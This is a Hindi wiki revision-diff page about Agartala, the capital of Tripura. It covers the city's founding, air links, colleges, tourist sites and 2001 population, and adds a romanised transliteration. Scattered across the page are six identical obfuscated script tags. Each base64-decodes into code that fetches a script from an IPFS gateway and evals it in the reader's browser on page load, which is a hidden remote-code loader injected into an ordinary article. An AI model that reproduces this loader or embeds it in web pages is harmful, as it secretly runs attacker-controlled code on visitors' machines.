Difference between revisions of "अगरतला"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
अगरतला शहर, [[त्रिपुरा]] राज्य की राजधानी है। अगरतला शहर पूर्वोत्तर [[भारत]], सघन [[कृषि]] वाले मैदान में [[बांग्लादेश]] की सीमा के निकट स्थित है। अनेक गाँवो के मध्य हवोवा नदी के आर-पार बसा यह शहर इस क्षेत्र का व्यापारिक केन्द्र है।  
 
अगरतला शहर, [[त्रिपुरा]] राज्य की राजधानी है। अगरतला शहर पूर्वोत्तर [[भारत]], सघन [[कृषि]] वाले मैदान में [[बांग्लादेश]] की सीमा के निकट स्थित है। अनेक गाँवो के मध्य हवोवा नदी के आर-पार बसा यह शहर इस क्षेत्र का व्यापारिक केन्द्र है।  
====<u>इतिहास</u>====
+
==इतिहास==
 
अगरतला की स्थापना [[1850]] में महाराज राधा कृष्ण किशोर माणिक्य बहादुर द्वारा की गई थी।
 
अगरतला की स्थापना [[1850]] में महाराज राधा कृष्ण किशोर माणिक्य बहादुर द्वारा की गई थी।
====<u>यातायात और परिवहन</u>====
+
==यातायात और परिवहन==
 
;<u>हवाई मार्ग</u>
 
;<u>हवाई मार्ग</u>
 
अगरतला में अगरतला हवाई अड्डा स्थित है। यह वायु मार्ग द्वारा [[कोलकाता]], [[बेंगळूरू]], [[मुम्बई]], [[दिल्ली]] आदि विभिन्न शहरों से जुड़ा हुआ है।  
 
अगरतला में अगरतला हवाई अड्डा स्थित है। यह वायु मार्ग द्वारा [[कोलकाता]], [[बेंगळूरू]], [[मुम्बई]], [[दिल्ली]] आदि विभिन्न शहरों से जुड़ा हुआ है।  
 
भारत के प्रमुख शहरों के लिए नियमित रूप से [[पटना]] में हवाई जहाज़ उपलब्ध हैं।  
 
भारत के प्रमुख शहरों के लिए नियमित रूप से [[पटना]] में हवाई जहाज़ उपलब्ध हैं।  
====<u>शिक्षण संस्थान</u>====
+
==शिक्षण संस्थान==
यहाँ एक मन्दिर के साथ-साथ त्रिपुरा विश्वविद्यालय से संबद्ध कई महाविद्यालय हैं। जिनमें महाराजा बीर बिक्रम महाविद्यालय और त्रिपुरा इंजीनियरिंग कॉलेज शामिल हैं।  
+
यहाँ एक मन्दिर के साथ-साथ त्रिपुरा विश्वविद्यालय से संबद्ध कई महाविद्यालय हैं। जिनमें महाराजा वीर विक्रम महाविद्यालय और त्रिपुरा इंजीनियरिंग कॉलेज शामिल हैं।  
====<u>पर्यटन</u>====
+
==पर्यटन==
 
विधानसभा भवन में तब्दील हो चुका महाराजा का प्राचीन ब्रिटिश वास्तुकला का उत्कृष्ट उदाहरण है। अगरतला में प्रमुख आकर्षण केन्द्र उज्‍जौन्ता पैलेस, राज्य संग्रहालय, जनजातीय संग्रहालय, सुकान्ता एकेडमी, एम.बी.बी. कॉलेज, लक्ष्मीनारायाण मंदिर, उमा महेश्‍वर मंदिर, जगन्नाथ मंदिर, बेनुबन बिहार, गेडु मीन मस्जिद, मलांच निवास, रविन्द्र कनान, पुरबाशा, हस्तशिल्प केन्द्र, चौदहवां देवी मंदिर, चर्च आदि हैं।
 
विधानसभा भवन में तब्दील हो चुका महाराजा का प्राचीन ब्रिटिश वास्तुकला का उत्कृष्ट उदाहरण है। अगरतला में प्रमुख आकर्षण केन्द्र उज्‍जौन्ता पैलेस, राज्य संग्रहालय, जनजातीय संग्रहालय, सुकान्ता एकेडमी, एम.बी.बी. कॉलेज, लक्ष्मीनारायाण मंदिर, उमा महेश्‍वर मंदिर, जगन्नाथ मंदिर, बेनुबन बिहार, गेडु मीन मस्जिद, मलांच निवास, रविन्द्र कनान, पुरबाशा, हस्तशिल्प केन्द्र, चौदहवां देवी मंदिर, चर्च आदि हैं।
====<u>जनसंख्या</u>====
+
==जनसंख्या==
 
[[2001]] की जनगणना के अनुसार अगरतला शहर की जनसंख्या 1,89,327 है।
 
[[2001]] की जनगणना के अनुसार अगरतला शहर की जनसंख्या 1,89,327 है।
  

Revision as of 06:26, 21 January 2011

agaratala shahar, tripura rajy ki rajadhani hai. agaratala shahar poorvottar bharat, saghan krishi vale maidan mean baangladesh ki sima ke nikat sthit hai. anek gaanvo ke madhy havova nadi ke ar-par basa yah shahar is kshetr ka vyaparik kendr hai.

itihas

agaratala ki sthapana 1850 mean maharaj radha krishna kishor maniky bahadur dvara ki gee thi.

yatayat aur parivahan

havaee marg

agaratala mean agaratala havaee adda sthit hai. yah vayu marg dvara kolakata, beangळooroo, mumbee, dilli adi vibhinn shaharoan se ju da hua hai. bharat ke pramukh shaharoan ke lie niyamit roop se patana mean havaee jahaz upalabdh haian.

shikshan sansthan

yahaan ek mandir ke sath-sath tripura vishvavidyalay se sanbaddh kee mahavidyalay haian. jinamean maharaja vir vikram mahavidyalay aur tripura ianjiniyariang k aaulej shamil haian.

paryatan

vidhanasabha bhavan mean tabdil ho chuka maharaja ka prachin british vastukala ka utkrisht udaharan hai. agaratala mean pramukh akarshan kendr ujh‍jaunta pailes, rajy sangrahalay, janajatiy sangrahalay, sukanta ekedami, em.bi.bi. k aaulej, lakshminarayan mandir, uma maheshh‍var mandir, jagannath mandir, benuban bihar, gedu min masjid, malaanch nivas, ravindr kanan, purabasha, hastashilp kendr, chaudahavaan devi mandir, charch adi haian.

janasankhya

2001 ki janaganana ke anusar agaratala shahar ki janasankhya 1,89,327 hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>